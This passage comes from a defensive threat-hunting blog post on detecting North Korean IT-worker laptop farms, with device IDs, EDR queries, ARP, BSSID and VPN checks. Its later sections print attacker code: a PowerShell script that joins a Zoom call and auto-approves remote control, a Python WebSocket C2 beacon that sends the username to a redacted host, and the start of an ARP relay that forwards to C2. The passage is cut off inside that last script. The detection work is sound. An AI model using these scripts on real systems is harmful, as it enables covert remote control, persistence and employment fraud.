already been done by <a href="https://blog.grumpygoose.io/hold-me-closer-tinypilot-f94455431921">Grumpy Goose Labs</a> in a couple of <a href="https://blog.grumpygoose.io/unemployfuscation-1a1721485312">blog posts.</a> Frankly there’s nothing really to add to it and I’d just be cribbing their notes. That said, I can at least take those indicators and plug them into logic for the big list o’ tools. I’ll also add a few more queries you can try that aren’t necessarily specific to PiKVM or TinyPilot, but may assist in identifying similar devices – since they’re probably going to switch up (and have.. as you’ll see at the end of this).</p> <p>So first things first, let’s restate the good work from Grumpy Goose in the form of default config and indicators. Most of this relies on the default configuration of both devices. This is how they would present themselves to the OS of the system they are accessing via physical plug-in.</p> <p><br /> <strong>TinyPilot:</strong></p> <ul> <li><strong>Vendor ID (VID):</strong> 1D6B</li> <li><strong>Product ID (PID):</strong> 0104</li> <li><strong>Serial Number:</strong> 6b65796d696d6570690</li> <li><strong>Manufacturer:</strong> tinypilot</li> </ul> <p><br /> <strong>PiKVM:</strong></p> <ul> <li><strong>Vendor ID (VID):</strong> 1D6B</li> <li><strong>Product ID (PID):</strong> 0104</li> <li><strong>Serial Number:</strong> CAFEBABE</li> <li><strong>Manufacturer:</strong> PiKVM</li> </ul> <p><br /> <strong>Why it’s useful:</strong></p> <p>These identifiers are consistent in default configurations and can be used to detect hardware KVM devices connected to endpoints.</p> <p><br /></p> <h3 id="powershell-detection-commands">PowerShell Detection Commands</h3> <p><br /> <strong>TinyPilot Detection:</strong> <br /></p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-CimInstance</span><span class="w"> </span><span class="nt">-ClassName</span><span class="w"> </span><span class="nx">Win32_PnPEntity</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.PNPDeviceID</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s1">'\*6b65796d696d6570690\*'</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Description</span><span class="p">,</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">DeviceID</span><span class="p">,</span><span class="w"> </span><span class="nx">Manufacturer</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>PiKVM Detection:</strong></p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-CimInstance</span><span class="w"> </span><span class="nt">-ClassName</span><span class="w"> </span><span class="nx">Win32_PnPEntity</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.PNPDeviceID</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s1">'\*CAFEBABE\*'</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Description</span><span class="p">,</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">DeviceID</span><span class="p">,</span><span class="w"> </span><span class="nx">Manufacturer</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>Why it’s useful:</strong></p> <p>These commands allow for the identification of connected devices based on known serial numbers, facilitating the detection of each KVM type.</p> <p>So Grumpy Goose has the Crowdstrike query locked down great, here’s the big table of everybody else (and also a more generic offering on my behalf for Falcon) <br /></p> <table> <thead> <tr> <th><strong>Tool</strong></th> <th><strong>Detection Logic / Rule / Location</strong></th> </tr> </thead> <tbody> <tr> <td><strong>Cortex XDR</strong></td> <td>dataset = xdr_data<br />| filter event_type = ENUM.DEVICE<br />and (device_instance_id contains “6b65796d696d6570690” or device_instance_id contains “CAFEBABE”)<br />| fields agent_hostname, event_sub_type, device_instance_id, device_vendor_id, device_product_id, actor_process_image_name, _time<br />| sort _time desc</td> </tr> <tr> <td><strong>CrowdStrike Falcon</strong></td> <td>```(event_simpleName=”PnPDeviceConnected” OR event_simpleName=”DcUsbDeviceConnected”)<br />AND (DeviceInstanceId=”*6b65796d696d6570690*” OR DeviceInstanceId=”*CAFEBABE*”)<br />| table timestamp, ComputerName, DeviceName, DeviceInstanceId, DeviceManufacturer, DeviceDescription```</td> </tr> <tr> <td><strong>Elastic Agent (KQL)</strong></td> <td>event.category : “device” and<br />(event.action : “connected” or event.action : “device_add”) and<br />(device.device_id : “*6b65796d696d6570690*” or device.device_id : “*CAFEBABE*”)</td> </tr> <tr> <td><strong>osquery</strong></td> <td>SELECT<br />vendor,<br />vendor_id,<br />product,<br />serial,<br />model<br />FROM usb_devices<br />WHERE serial LIKE ‘%6b65796d696d6570690%’<br />OR serial LIKE ‘%CAFEBABE%’;</td> </tr> <tr> <td><strong>SentinelOne XDR</strong></td> <td>event_type = “USB_DEVICE”<br />AND (<br />usb.serial_number CONTAINS “6b65796d696d6570690” OR<br />usb.serial_number CONTAINS “CAFEBABE”<br />)</td> </tr> <tr> <td><strong>Tenable Nessus</strong></td> <td>Really pushing the intent of this tool now – but you could try:<br /><strong>800042</strong> - USB Device Summary<br /><strong>24274</strong> - USB Drives Enumeration (WMI)</td> </tr> </tbody> </table> <p><br /> Of course, this is dependent on the laptop farm utilizing default configs for these devices in their setup. This might be more common than you think, if you consider that most <a href="https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north">publicly available</a> examples suggest DPRK operators are using US facilitators of varying technical aptitude.</p> <p>Changing the config and making either device is relatively simple, outlined here (<a href="https://docs.pikvm.org/id/">https://docs.pikvm.org/id/</a>) and here (<a href="https://tinypilotkvm.com/faq/target-detect-tinypilot/#modifying-tinypilots-display-information">https://tinypilotkvm.com/faq/target-detect-tinypilot/#modifying-tinypilots-display-information</a>). You can try looking for that Corsair Gaming RGB in the PiKVM guide, as some will just follow the guide (I’ve actually seen this one), but a savvy user can look up any product information and fill out the config appropriately.</p> <p>That said, there are some more generic queries you can use that will grab all USB peripherals as well as video capture devices. This can be useful for comparing individual systems to see if they’ve got weirdness like two “keyboards” plugged in.</p> <p><br /> <strong>Generic USB and HID Device Detection (Windows)</strong></p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># List all connected USB hubs</span><span class="w"> </span><span class="n">Get-WmiObject</span><span class="w"> </span><span class="nx">Win32_USBHub</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Name</span><span class="p">,</span><span class="w"> </span><span class="nx">DeviceID</span><span class="p">,</span><span class="w"> </span><span class="nx">Status</span><span class="w"> </span><span class="c"># List all HID-class devices (e.g., keyboards, mice, some KVMs)</span><span class="w"> </span><span class="n">Get-PnpDevice</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.Class</span><span class="w"> </span><span class="o">-eq</span><span class="w"> </span><span class="s2">"HIDClass"</span><span class="w"> </span><span class="o">-and</span><span class="w"> </span><span class="err">$</span><span class="nx">\_.Status</span><span class="w"> </span><span class="o">-eq</span><span class="w"> </span><span class="s2">"OK"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="c"># Search for suspicious device IDs (fallback if vendor-specific IDs are unknown)</span><span class="w"> </span><span class="n">Get-CimInstance</span><span class="w"> </span><span class="nt">-ClassName</span><span class="w"> </span><span class="nx">Win32_PnPEntity</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.PNPDeviceID</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s1">'\*usb\*'</span><span class="w"> </span><span class="o">-and</span><span class="w"> </span><span class="err">$</span><span class="nx">\_.Description</span><span class="w"> </span><span class="o">-match</span><span class="w"> </span><span class="s1">'Generic|Composite|Capture'</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">Description</span><span class="p">,</span><span class="w"> </span><span class="nx">DeviceID</span><span class="p">,</span><span class="w"> </span><span class="nx">Manufacturer</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>Why it’s useful:</strong> <br /> These methods help baseline known-good devices and spot <strong>unexpected USB peripherals</strong> such as video capture devices or composite interfaces that often accompany KVM implants. While less precise than vendor-ID-based detections, they are useful for <strong>detecting new, spoofed, or rebranded hardware</strong>.</p> <p><br /> <strong>Detection of Video Capture Devices (Windows)</strong></p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Look for video capture or HDMI-input devices</span><span class="w"> </span><span class="n">Get-WmiObject</span><span class="w"> </span><span class="nx">Win32_VideoController</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Where-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="err">$</span><span class="n">\_.Name</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s2">"\*capture\*"</span><span class="w"> </span><span class="o">-or</span><span class="w"> </span><span class="err">$</span><span class="nx">\_.Name</span><span class="w"> </span><span class="o">-like</span><span class="w"> </span><span class="s2">"\*USB\*"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="c"># Check for registry-based hardware fingerprints</span><span class="w"> </span><span class="n">Get-ItemProperty</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="s2">"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e96e-e325-11ce-bfc1-08002be10318}\\\*"</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-Object</span><span class="w"> </span><span class="nx">DriverDesc</span><span class="p">,</span><span class="w"> </span><span class="nx">MatchingDeviceId</span><span class="w"> </span></code></pre></div></div> <p><br /> <strong>Why it’s useful:</strong> <br /> KVM-over-IP devices often include HDMI or USB video capture components. This technique highlights systems that <strong>expose video input hardware despite no legitimate use case</strong>, particularly on user endpoints where capture functionality is unnecessary.</p> <p>Setting up a KVM device like this does take some doing, and as public awareness of this scheme grows operators will need to obfuscate what they’re doing when approaching potential farmers. Notionally, it’ll be tough to justify to an unwitting facilitator that receiving, plugging in and configuring strange devices is above-board.</p> <p><br /></p> <h1 id="endpoint-technical-indicators">Endpoint Technical Indicators</h1> <p><br /> But if you start to tie all of these things together, some wider analysis strategies sort of organically come to fruition. As operators increasingly leverage physically co-located infrastructure, using the same farm with devices on the same LAN, defenders must look beyond software telemetry and start interrogating the local network environment itself.</p> <p>Think Endpoint-resident observations like ARP tables and Wi-Fi SSIDs, which can reveal the presence of unknown or suspicious devices operating nearby. When combined with tools like arp, netsh wlan, or open-source intelligence platforms like <a href="https://wigle.net/">Wigle.net</a>, these techniques allow defenders to map the physical and wireless context of an endpoint, uncovering lateral indicators that traditional EDRs may miss.</p> <p>A quick note on privacy issues – Uh.. a thing nobody seems to talk about is how most EDR and endpoint tools for remote workforces are able to take a peek at employees’ local LANs. That’s probably a thing that should be talked about more, but I’m not going to touch it today. I’m just going to point out what is possible and how it can be used in the context of this problem set. <br /></p> <h2 id="arp-tables">ARP Tables</h2> <p><br /> The idea behind this strategy is the assumption that a DPRK operator on your network is utilizing a laptop farm with other systems on the LAN (i.e. just a simple arp -a). Since all these systems are talking to each other via ARP, you should be able to grab MAC addresses. This can be useful for detecting large numbers of PiKVMs or TinyPilots, for instance. More generally, big lists of systems <em>might</em> be suspect, but that gets tougher for folks with larger device footprints or working in public spaces or a coworking environment. In other words – if I’m seeing 10 RPi’s and 10 Intel NICs – maybe I look into that a bit more. Here’s the MAC prefixes for the devices we’ve discussed thus far:</p> <table> <thead> <tr> <th>Device</th> <th>MAC Prefix</th> </tr> </thead> <tbody> <tr> <td>TinyPilot</td> <td>04c98b</td> </tr> <tr> <td>Raspberry Pi</td> <td>b827eb</td> </tr> <tr> <td>Raspberry Pi</td> <td>28cdc1</td> </tr> <tr> <td>Raspberry Pi</td> <td>d83add</td> </tr> <tr> <td>Raspberry Pi</td> <td>dca632</td> </tr> <tr> <td>Raspberry Pi</td> <td>e45f01</td> </tr> <tr> <td>Raspberry Pi</td> <td>2ccf67</td> </tr> <tr> <td>Raspberry Pi</td> <td>3a3541</td> </tr> <tr> <td>Raspberry Pi</td> <td>88a29e</td> </tr> </tbody> </table> <p><br /> And some simple Powershell</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">arp</span><span class="w"> </span><span class="nt">-a</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select-String</span><span class="w"> </span><span class="s1">'04-C9-8B|B8-27-EB|28-CD-C1|D8-3A-DD|DC-A6-32|E4-5F-01|2C-CF-67|3A-35-41|88-A2-9E'</span><span class="w"> </span></code></pre></div></div> <p><br /> This helps with hardware detection, the assumption being that 1) your DPRK employee is working through a laptop farm and 2) said laptop farm uses PiKVMs or TinyPilots for it’s access. Depending on your EDR (if you have an EDR), you can dig a little deeper into this theory.</p> <p><br /></p> <h2 id="crowdstrike-falcons-unmanaged-assets">Crowdstrike Falcon’s “Unmanaged Assets”</h2> <p><br /> My real-world experience is primarily with <strong>CrowdStrike Falcon</strong>, so that’s the example I’ll focus on. After reviewing documentation from other EDR platforms, it doesn’t appear that many competitors offer a feature quite like Falcon’s <strong>Unmanaged Assets</strong>, which collects various data points — including hostnames and MAC addresses — to identify nearby devices on the LAN. That said, it’s possible similar capabilities exist under different names or configurations in other tools. This isn’t an endorsement of CrowdStrike; I’m simply highlighting a feature I’ve personally used that proved useful in this specific context.</p> <p>Anyway – it’s not super clear in publicly available data how exactly this works (a la this <a href="https://www.reddit.com/r/crowdstrike/comments/lf8hms/how_cs_identify_unmanaged_assets/">Reddit post</a>), but generally speaking you can expect Crowdstrike to look for other neighboring systems that are not checking in to its server to be flagged as “Unmanaged Assets” or “Unsupported Assets”.</p> <p><br /> <img src="https://github.com/user-attachments/assets/48b23cc3-047d-4f4f-995c-d93202f4ff31" alt="image" /></p> <p>If you have the product, you can apparently read about it here: <a href="https://falcon.crowdstrike.com/documentation/426/asset-discovery">https://falcon.crowdstrike.com/documentation/426/asset-discovery</a></p> <p>This is the best publicly available screenshot I could get, but essentially various data points about neighboring systems that DO NOT have a Crowdstrike agent installed OR are not checking in to this particular instance are flagged as “Unmanaged”.</p> <p><br /> <img src="https://github.com/user-attachments/assets/53d2dd4b-78dc-4870-bd0f-ab3612c5711d" alt="image" /> <br /></p> <p>So you can probably imagine how this can be useful. In addition to looking up any “Unmanaged Assets” with MAC addresses matching Raspberry Pi’s or TinyPilots, we can also check suspect systems to see if they are on LANs with large rosters of other systems that look like laptops.</p> <p>This can be done in either “direction”, meaning you could start with fingerprinted Raspberry Pi’s, see which Managed Asset can see them (and how many), and subsequently identify other laptops on the LAN. Alternatively, you could find Managed Assets with large numbers of Unmanaged Assets associated with them. In this case, look for “business-y” sounding hostnames. “HR-MB001” or “FIN-001”, “OFFICE-DT-204”, “US-BOSTON-ADMIN01” or “NYC-SALES01”. Hostnames like this suggest fleet management, rather than the “Matt’s Laptop” sort of thing you might see with a personally owned device. <strong>KEEP IN MIND</strong> that you might just be looking at a WeWork or a Starbucks – but this is still a valid strategy.</p> <p>To give a very easy (and on-the-nose) example, let’s say you suspect an employee of being a DPRK operator – on their local LAN, you find Raspberry Pis and 7 other laptops with very corporate sounding names. Falcon makes this easy, but this is still partially observable via simple ARP as well. In either case, I would absolutely be looking further into this.</p> <p><br /></p> <h2 id="bssid--wigle">BSSID + Wigle</h2> <p><br /> Additionally, using the <strong>BSSID</strong> — the unique MAC address of a Wi-Fi access point — opens up a powerful avenue for geolocation, especially when combined with open-source tools like <a href="https://wigle.net">Wigle.net</a>. When a laptop connects to a wireless network, the BSSID can often be observed via system logs, network telemetry, or endpoint queries. Analysts can take that BSSID and plug it into Wigle’s database, which crowdsources the physical locations of Wi-Fi networks based on prior scans.</p> <p>This technique becomes especially valuable in the context of <strong>remote work fraud</strong>, where individuals may misrepresent their physical location — claiming to be based in a certain city or region to meet job requirements or evade scrutiny. While it’s often difficult for a SOC or analyst to independently verify a user’s actual location, the BSSID provides a quiet but reliable fingerprint of the wireless network the device is connected to. By looking up that BSSID on Wigle.net, analysts can often identify the <strong>approximate physical location</strong> of the access point — sometimes down to a building or block. This doesn’t guarantee you’ve geolocated the person (they could be using a neighbor’s Wi-Fi or tethering), but in practice it offers a useful signal when evaluating claims of geographic presence. For example, if an employee states they are based in Atlanta but their laptop consistently connects through an access point mapped to Malaysia, that’s a flag worth chasing. So in that regard, it should be noted that this use-case is specific to shipping the laptop to another location and not specifically within a laptop farm, though geolocation within your respective country should also work (i.e. if they claim to be working out of City A but the BSSID maps to a location in City B).</p> <p><br /> <img src="https://github.com/user-attachments/assets/d7c9a1b7-8f65-4a5e-9f36-0224613cf5b8" alt="image" /></p> <div style="text-align: center;"> **“Just checking in from Atlanta”** </div> <p><br /></p> <table> <thead> <tr> <th><strong>Tool</strong></th> <th><strong>Query / Command</strong></th> </tr> </thead> <tbody> <tr> <td>PowerShell (Windows)</td> <td>netsh wlan show interfaces | Select-String “BSSID”</td> </tr> <tr> <td>CMD (Windows)</td> <td>netsh wlan show interfaces</td> </tr> <tr> <td>CrowdStrike Falcon (specifically through RTR)</td> <td>netsh wlan show interfaces (run in RTR shell)</td> </tr> <tr> <td>osquery</td> <td>SELECT ssid, bssid, signal_strength FROM wifi_status;</td> </tr> <tr> <td>Elastic Agent (KQL)</td> <td>host.name:”hostname” and wifi.bssid:*</td> </tr> <tr> <td>SentinelOne XDR (Scripted)</td> <td>netsh wlan show interfaces (via scripted job)</td> </tr> <tr> <td>Cortex XDR</td> <td><em>Scripted collection only</em></td> </tr> <tr> <td>Tenable Nessus</td> <td><em>Don’t think this is collected</em></td> </tr> </tbody> </table> <p><br /></p> <h1 id="network-technical-indicators">Network Technical Indicators</h1> <p><br /> Alright, network level. There’s two basic approaches I’m aware of in this regard, one that may or may not involve a laptop farm (VPN usage could route through a domestic network but – it also may not, and one that pretty clearly points to remote access into a laptop farm.</p> <p><br /></p> <h2 id="astrill-vpn">Astrill VPN</h2> <p><br /> One particularly useful starting point is the identification of commercial VPN usage. <strong>Astrill VPN</strong>, in particular, has been cited in reporting related to contractor misuse and fraud originating from the DPRK. It’s favored due to its obfuscation capabilities, stable infrastructure, and popularity among users operating from restrictive environments.</p> <p>Detection of <a href="https://cybersecuritynews.com/north-korean-it-workers-using-astrill-vpn/">Astrill VPN</a> can involve identifying known IP ranges, DNS resolution of Astrill-related domains (e.g., api.astrill.com, *.astrillvpn.com), or unusual SSL certificate issuers during traffic inspection. In environments with packet capture or proxy logs, analysts may also look for persistent connections to unfamiliar data centers in Hong Kong, Singapore, or Eastern Europe — common exit points for Astrill. There’s plenty of <a href="https://www.silentpush.com/blog/astrill-vpn/">public reporting</a> elsewhere on this, but arguably <a href="https://spur.us/astrill-vpn-and-remote-worker-fraud/">Spur is the authoritative source</a> currently for Astrill VPN IPs. They currently are offering their tracking of Astrill VPN space for free in a simple .txt <a href="https://storage.googleapis.com/spur-astrill-vpn/ips.txt">right here</a>. <br /></p> <h2 id="checking-for-login-panels">Checking for Login Panels</h2> <p><br /> Once you’ve identified the <strong>public IP</strong> of a remote worker’s machine — whether through endpoint telemetry, VPN/proxy logs, or EDR metadata — it opens another valuable detection path. Feeding that IP into tools like <strong>Shodan</strong> or <strong>Censys</strong> can reveal any <strong>public-facing services</strong> exposed by that system. If a <strong>TinyPilot</strong>, <strong>PiKVM</strong>, or <strong>Apache Guacamole</strong> interface is discovered accessible on the public internet, that’s a major red flag. It could indicate the worker is exposing a KVM device or remote access system directly to the internet for convenience or for control by a third party. Even if authentication is required, the presence of such services may reflect attempts to quietly manage a laptop farm or facilitate anonymous access. This is also a good supporting step during an investigation – taking what we’ve covered so far, if you’ve got multiple PiKVMs on LAN, a roster of suspect unaffiliated laptops, and now you’ve got a PiKVM log-in screen that’s public facing.. well – you’ve got yourself a nice little case.</p> <p>Here’s how you’d find them: <br /> <img src="https://github.com/user-attachments/assets/fc3b2a02-3d3c-4685-983e-355867887a0d" alt="image" /> <br /></p> <p>Notionally you’d be doing this after you already have a public IP to investigate, but for demonstrative purposes you can use a tool like <a href="https://www.shodan.io/">Shodan</a> or <a href="https://search.censys.io/">Censys</a> to grab html headers, titles or body content.</p> <p><br /> <img src="https://github.com/user-attachments/assets/3a803c5e-d51c-4f90-bb86-5053372f7f10" alt="image" /> <br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- http.html:'&lt;script src="guacamole' - http.title:"PiKVM" - http.title:"TinyPilot" </code></pre></div></div> <p><br /></p> <p>HTTP Title can be changed, but these work in a pinch (plus if you’re drilling into an individual IP, things besides the title should be apparent). I like to grab body html where possible, which is why I’m using a snippet of JavaScript included on most Apache Guacamole logins. <br /></p> <h1 id="very-north-korea--jankyclever-tricks">Very North Korea – Janky/Clever Tricks</h1> <p><br /> Here’s where things get interesting and I have my suspicions that quite a bit of this is out there. If the FBI is to believed that <a href="https://apnews.com/article/north-korea-weapons-program-it-workers-f3df7c120522b0581db5c0b9682ebc9b">“thousands” of workers</a> are embedded across workforces, there has to be some more low-detection mechanisms in place that are allowing for persistence. In other words, whether it is being designed intentionally or not, there has to be some level of uniformity either coalescing organically or being deployed by design. At scale, I’m skeptical that so many organizations would allow for RMM tools like AnyDesk to be installed. I’m not naïve, but that simply cannot be the overarching strategy here.</p> <p>I’m similarly skeptical of boutique (and relatively expensive, at scale.. ~$400 a pop) devices, which require at least a moderate level of technical proficiency in order to configure them, as the approach of choice as well. Particularly when you consider the obfuscation required, operators essentially must coach a farmer through configuration or send them a preconfigured device. All of this gets too messy too fast, and keep in mind this scheme also relies on not making your employer suspicious.</p> <p>While both of these approaches absolutely do exist and are used, I don’t see it as cost-effective when there are other strategies you can employ that are arguably harder to detect, less expensive to deploy, and are minimal labor load and technical skill requirement on the part of the hosting laptop farmer. It’s much simpler, cheaper and stealthier to just set up a Zoom meeting once a day and grant control to the remote operator. I think this is probably the most common technique.</p> <p>That said I should note my own bias creeping in – I’ve personally seen a lot more of the Zoom sharing than any fancy hardware (and I’ve frankly never worked anywhere where someone could just install AnyDesk, so I can’t speak to that).</p> <p><br /></p> <h2 id="zoom-meetings-and-web-socket-c2">Zoom Meetings and Web Socket C2</h2> <p><br /></p> <p>So what am I talking about here? Essentially at the very basic user level, I’m referring to the practice of using Zoom or a similar meeting platform to share the screen of a target machine and hand over remote control to the operator. This is painfully simplistic, virtually indistinguishable from other legitimate remote work, and extremely low-cost. The challenge here is setting up a mechanism to ensure persistent remote-control day after day. This can certainly be facilitated by the laptop farmer manually, but as I mentioned, it is likely getting increasingly more difficult to find laptop farmers, and it is likely that any level of anonymization and obfuscation (e.g. “I had no idea, I just plug the laptops in and let them run”) is preferred by the farmers. So what to do?</p> <p>Currently the best sourcing on this is <a href="https://www.sygnia.co/blog/unmasking-north-korean-it-farm/">Sygnia</a>, but there’s snippets of this and the supporting code floating around. In short – there’s a few different ways operators are being found to be persisting via the “Zoom Meeting Method”. <strong>First</strong>, basic Powershell and Power Automate to automate a join and relinquishing of screen control once a day, <strong>second</strong>, lightweight Python scripts on the target system itself receives commands via ARP from a standalone controller device (I know – trust me on this) to launch a Zoom meeting, or perhaps most elegantly – Raspberry Zero HIDs devices receiving automation commands. I’ll go in order.</p> <p><br /></p> <h3 id="all-windows--power-automate--powershell">All Windows – Power Automate / PowerShell</h3> <p><br /></p> <p>This is generally the most simple way to do this but coincidentally also one of the most detectable. It’s primarily accomplished via automation in Power Automate or PowerShell and is a relatively simple way to ensure persistence for daily work. Essentially, a pre-scheduled Zoom meeting is accessed via direct url (zoommtg://), launched via .ps1 scheduled task or direct from Power Automate, and utilizes a .NET class to automate a key press. A critical piece of the chain involves using SendKeys to automate pressing the ENTER key, generally timed to coincide with a pop-up request for control from the operator that has joined the meeting from the other side.</p> <p>The Powershell might look something like this:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Launch Zoom with a specific meeting URI</span><span class="w"> </span><span class="n">Start-Process</span><span class="w"> </span><span class="s2">"zoommtg://zoom.us/join?action=join&amp;confno=123456789&amp;pwd=examplepass"</span><span class="w"> </span><span class="c"># Wait for Zoom to open and the remote control request to appear</span><span class="w"> </span><span class="n">Start-Sleep</span><span class="w"> </span><span class="nt">-Seconds</span><span class="w"> </span><span class="nx">12</span><span class="w"> </span><span class="c"># this is variable</span><span class="w"> </span><span class="c"># Load the necessary .NET class for SendKeys</span><span class="w"> </span><span class="n">Add-Type</span><span class="w"> </span><span class="nt">-AssemblyName</span><span class="w"> </span><span class="nx">System.Windows.Forms</span><span class="w"> </span><span class="c"># Send the "Enter" key to approve remote control</span><span class="w"> </span><span class="p">[</span><span class="n">System.Windows.Forms.SendKeys\</span><span class="p">]::</span><span class="n">SendWait</span><span class="p">(</span><span class="s2">"{ENTER}"</span><span class="p">)</span><span class="w"> </span></code></pre></div></div> <p><br /> And the workflow would look something like this:</p> <p><img src="https://github.com/user-attachments/assets/02591835-c9b2-466f-bc3d-0610f784ac9e" alt="image" /></p> <p><br /></p> <h3 id="summarizing-sygnias-work">Summarizing Sygnia’s Work</h3> <p><br /> <a href="https://www.sygnia.co/blog/unmasking-north-korean-it-farm/">Sygnia’s investigation</a> uncovered a covert command-and-control (C2) mechanism presumably used by a North Korean IT worker operating inside a legitimate company. The infrastructure included a series of Python scripts running locally on the operator’s system, enabling communication with a <a href="https://www.blackhillsinfosec.com/command-and-control-with-websockets-wsc2/">remote WebSocket server</a>. A presence beaconing script periodically sent the current username to the C2 server via HTTP POST, while a WebSocket client maintained a persistent connection to receive real-time commands such as launching Zoom meetings or simulating keyboard input. These commands were executed locally using subprocess calls and tools like <a href="https://linux.die.net/man/1/xdg-open">xdg-open</a> and <a href="https://github.com/jordansissel/xdotool">xdotool</a>, suggesting the use of a Unix-like operating system. <br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">websocket</span> <span class="kn">import</span> <span class="nn">json</span> <span class="kn">import</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">requests</span> <span class="n">C2</span> <span class="o">=</span> <span class="s">"ws://[REDACTED]/"</span> <span class="n">USER_NAME</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">getenv</span><span class="p">(</span><span class="s">"USER"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">send_presence</span><span class="p">():</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">C2</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="s">"username"</span><span class="p">:</span> <span class="n">USER_NAME</span><span class="p">})</span> <span class="k">def</span> <span class="nf">on_message</span><span class="p">(</span><span class="n">ws</span><span class="p">,</span> <span class="n">message</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">message</span><span class="p">)</span> <span class="k">if</span> <span class="n">data</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"command"</span><span class="p">)</span> <span class="o">==</span> <span class="s">"open_zoom"</span><span class="p">:</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">([</span><span class="s">"xdg-open"</span><span class="p">,</span> <span class="s">"zoommtg://zoom.us/start"</span><span class="p">])</span> <span class="k">elif</span> <span class="n">data</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">"command"</span><span class="p">)</span> <span class="o">==</span> <span class="s">"approve_remote"</span><span class="p">:</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">([</span><span class="s">"xdotool"</span><span class="p">,</span> <span class="s">"key"</span><span class="p">,</span> <span class="s">"Return"</span><span class="p">])</span> <span class="n">ws</span> <span class="o">=</span> <span class="n">websocket</span><span class="p">.</span><span class="n">WebSocketApp</span><span class="p">(</span><span class="s">"ws://[REDACTED]"</span><span class="p">,</span> <span class="n">on_message</span><span class="o">=</span><span class="n">on_message</span><span class="p">)</span> <span class="n">ws</span><span class="p">.</span><span class="n">run_forever</span><span class="p">()</span> </code></pre></div></div> <p><br /> To extend control to nearby systems, the setup also used ARP-based communication. A “Command Rebroadcast Relay” script crafted ARP packets containing command identifiers within the hwsrc field and broadcast them on the local network. Companion scripts on other systems acted as passive ARP listeners, monitoring for these packets using Scapy. When a matching ARP packet was received, the listener extracted the payload and forwarded it back to the attacker’s C2 server. This notionally enabled real-time coordination of multiple compromised systems within the same LAN. <br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="n">sniff</span><span class="p">,</span> <span class="n">sendp</span><span class="p">,</span> <span class="n">Ether</span><span class="p">,</span> <span class="n">ARP</span> <span class="k">def</span> <span class="nf">process_arp</span><span class="p">(</span><span class="n">packet</span><span class="p">):</span> <span class="k">if</span> <span class="n">ARP</span> <span class="ow">in</span> <span class="n">packet</span> <span class="ow">and</span> <span class="n">packet</span><span class="p">[</span><span class="n">ARP</span><span class="p">].</span><span class="n">op</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">packet</span><span class="p">[</span><span class="n">ARP</span><span class="p">].</span><span class="n">hwsrc</span> <span class="n">forward_to_c2</span><span class="p">(</span><span 